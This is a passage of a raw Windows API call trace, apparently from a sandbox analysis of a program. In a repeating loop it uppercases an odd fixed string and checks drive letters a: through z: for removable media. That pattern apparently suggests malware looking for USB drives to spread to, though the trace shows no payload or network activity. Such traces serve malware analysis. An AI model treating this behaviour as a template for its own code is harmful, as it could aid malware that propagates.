| out: hHeap=0x12c0000) returned 1 [0207.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0207.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0207.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0207.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0207.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0207.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0207.846] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.846] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0207.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0207.846] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.846] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0207.846] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0207.846] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0207.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0207.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0207.846] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0207.846] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0207.846] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0207.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0207.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0207.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0207.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0207.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0207.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0207.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0207.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0207.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0207.847] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0207.847] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0207.847] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0207.847] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0207.848] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0207.848] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0207.848] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0207.848] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0207.848] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0207.848] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0207.849] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0207.849] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0207.849] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0207.849] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0207.849] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0207.850] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0207.850] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0207.850] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0207.850] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0207.850] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0207.851] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0207.851] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0207.851] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0207.851] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0207.851] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0207.852] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0207.852] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0207.852] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0207.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0207.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0207.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0207.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0207.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0207.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0207.853] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0207.853] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0207.853] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0207.853] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0207.853] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0207.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0207.853] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.853] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0207.853] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0207.853] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0207.853] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f80 [0207.853] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0207.853] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0207.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0207.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0207.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f80 | out: hHeap=0x12c0000) returned 1 [0207.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0207.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0207.854] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0207.854] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0207.854] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0207.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0207.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0207.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0207.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0207.855] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0207.855] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0207.855] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0207.855] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0207.855] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.855] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0207.855] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0207.855] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.855] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0207.855] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0207.855] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0207.855] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0207.855] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0207.855] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0207.855] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0207.855] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.855] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0207.855] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0207.855] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0207.855] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0207.856] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0207.856] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0207.856] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0207.856] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0207.856] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0207.856] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0207.856] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0207.856] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0207.856] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0207.856] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0207.856] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0207.856] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0207.857] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0207.857] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0207.857] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0207.857] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0207.857] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0207.858] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0207.858] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0207.858] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0207.858] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0207.858] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0207.859] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0207.859] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0207.859] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0207.859] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0207.859] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0207.860] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0207.860] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0207.860] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0207.860] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0207.860] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0207.861] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0207.861] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0207.861] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0207.861] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0207.861] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0207.861] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0207.861] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0207.861] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0207.861] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0207.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0207.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0207.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0207.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0207.862] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0207.862] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0207.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0207.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0207.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0207.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0207.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0207.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0207.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0207.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0207.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0207.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0207.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0207.863] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0207.863] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0207.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0207.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0207.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0207.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0207.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0207.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0207.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0207.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0207.864] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0207.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0207.864] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0207.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0207.864] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0207.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0207.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0207.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0207.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0207.864] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0207.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0207.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0207.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0207.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0207.865] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0207.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0207.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0207.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0207.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0207.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0207.865] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0207.865] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0207.865] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0207.865] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0207.866] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0207.866] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0207.866] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0207.866] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0207.866] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0207.866] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0207.867] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0207.867] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0207.867] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0207.867] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0207.867] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0207.868] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0207.868] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0207.868] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0207.868] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0207.869] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0207.869] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0207.869] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0207.869] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0207.869] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0207.870] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0207.870] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0207.870] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0207.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0207.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0207.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0207.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0207.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0207.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0207.951] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0207.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0207.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0207.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0207.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0207.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0207.952] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0207.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0207.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0207.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f60 [0207.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0207.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0207.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0207.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0207.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f60 | out: hHeap=0x12c0000) returned 1 [0207.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0207.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0207.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0207.953] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0207.953] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 